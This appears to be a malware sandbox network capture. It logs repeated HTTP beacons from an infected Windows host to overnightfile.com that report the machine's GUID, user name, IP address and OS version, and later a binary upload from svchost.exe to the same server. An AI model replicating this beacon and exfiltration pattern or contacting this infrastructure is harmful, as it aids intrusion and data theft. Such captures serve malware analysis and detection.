                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:27.577548027 CEST834INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:27 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 42 59 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cABYZARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:27.893368006 CEST834OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:27.983858109 CEST834INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:27 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBZAYARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:28.332865953 CEST835OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:28.423402071 CEST835INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:28 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZQJAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:29.189496994 CEST835OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:29.278027058 CEST836INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:28 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBNMYARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:29.990784883 CEST836OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:30.078178883 CEST836INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:29 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFFUUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:30.420001984 CEST837OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:30.511107922 CEST837INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:30 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTZAGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:30.873801947 CEST838OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:30.966468096 CEST838INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:30 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 42 59 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKBYPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:31.279530048 CEST838OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:31.368153095 CEST839INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:30 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 4d 4e 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cAMNZARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:31.696048021 CEST839OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:31.784147024 CEST839INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:31 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 4e 4d 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQNMJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:32.233062029 CEST840OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:32.324143887 CEST840INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:31 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZBYAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:33.262674093 CEST840OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:33.351138115 CEST841INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:32 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMGTNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:34.116233110 CEST841OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:34.205272913 CEST842INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:33 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 56 45 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCVEXARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:34.797559023 CEST842OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:34.885416031 CEST842INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:34 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 4b 50 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGKPTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:35.510005951 CEST843OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:35.601284981 CEST843INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:35 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMTGNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:35.949476004 CEST843OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:36.043642998 CEST844INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:35 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMBYNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:36.396820068 CEST844OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:36.487154007 CEST844INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:36 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 47 54 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKGTPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:36.786541939 CEST845OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:36.879302025 CEST845INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:36 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJHSQARRABw==0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      3192.168.1.1024970891.218.231.22680C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:20:40.204413891 CEST571OUTPOST /mlu/forum.php HTTP/1.0
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: identity, *;q=0
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      Content-Length: 191
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Connection: close
                                                                                                                                      Content-Encoding: binary
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                      Jul 14, 2020 11:20:40.264117956 CEST572OUTData Raw: fd b7 49 9d e1 52 b8 fb b8 1f 0e 7d 6d d6 fe 2a 86 47 33 90 39 42 95 e3 f0 df ca be a2 2e 9f de 99 3b 2c 38 7e 9e d5 44 0c 31 54 82 9d 4f 89 49 64 3b 7e 01 e4 04 02 aa b1 b0 21 ff 7d 53 66 a9 0c f2 61 38 36 ac 38 11 62 84 67 51 31 5b ba 9d b7 e7
                                                                                                                                      Data Ascii: IR}m*G39B.;,8~D1TOId;~!}Sfa868bgQ1[>\LiHjhh[Qqv&NKN_?_n&.5-A& 5n<F(}2Df
